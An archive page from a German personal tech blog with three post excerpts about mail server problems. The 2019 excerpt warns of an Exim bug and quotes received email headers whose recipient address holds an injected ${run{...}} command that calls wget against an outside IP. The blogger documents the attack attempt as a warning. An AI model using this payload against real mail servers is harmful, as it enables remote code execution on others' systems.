Froschs Blog

Computer und was das Leben sonst noch so zu bieten hat

Zur Website | Impressum

Achtung, Exim-Bug unterwegs!

Donnerstag, 20. Juni 2019

Gestern erhielt ich zwei … „interessante“ E-Mails an den root-Account meines Servers. Der Body war jeweils leer. Der Header sieht so aus:

Return-Path: <support@service.com>
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f176.9.63.237x22}}@atari-frosch.de
Delivered-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f176.9.63.237x22}}@atari-frosch.de
Received: from service.com (flamingw.arvixecloud.com [108.175.157.131])
        by mail.atari-frosch.de (Postfix) with SMTP id B61EAC9E8;
        Wed, 19 Jun 2019 16:58:45 +0200 (CEST)

Darunter folgten noch 31 Received-Zeilen, die jedoch nur jeweils die Zahlen von 1 bis 31 enthielten. Die To:-Zeile ist dabei das Spannende: (mehr …)


Mailrouting mit Knoten

Freitag, 1. Juli 2016

Seit heute früh schlagen bei mir Traffic-Warnungen von Hetzner für den alten Server auf. Der schleust derzeit ca. 3 GB pro Stunde durch (ab 1 GB/h lasse ich warnen). Schließlich fand ich heraus, daß die Tor-Bridge von mehreren Clients verwendet wurde bzw. wird; das könnten die dann wohl (gewesen) sein. Na gut, die dürfen das.

Bei der Suche ging ich natürlich alle Logs durch und stellte dabei eher so nebenbei fest, daß das Mailsystem meinte, keine Mails mehr an die Hauptdomain atari-frosch.de ausliefern zu können. Obwohl mail.atari-frosch.de seit 12. Mai auf dem neuen Server liegt und ich eigentlich der Meinung gewesen war, das dem alten Server kommuniziert zu haben, bestand er darauf, lokal auszuliefern. Oder besser, das zu versuchen: Es ging nicht, weil unter /var/mail angeblich Verzeichnis- und Dateirechte fehlen würden. Also bin ich dem mal nachgegangen. (mehr …)


Streß im Taubenschlag

Mittwoch, 15. Juli 2009

Seit Oktober 2007 läuft mein Mailsystem, bestehend aus postfix und dovecot. Und es lief genau bis letzten Sonntag, als ich die offenbar gar nicht so gute Idee hatte, den Server „mal eben” von Etch auf Lenny zu hieven. Aufgefallen ist es mir dann gestern vormittag, als auf den Accounts meiner Domain nicht einmal mehr Spams aufschlugen (für irgendwas müssen die ja gut sein). Das mail.log erzählte mir, daß für dovecot irgendwelche Rechte fehlten. Hoppla, das stimmte doch vorher alles? (mehr …)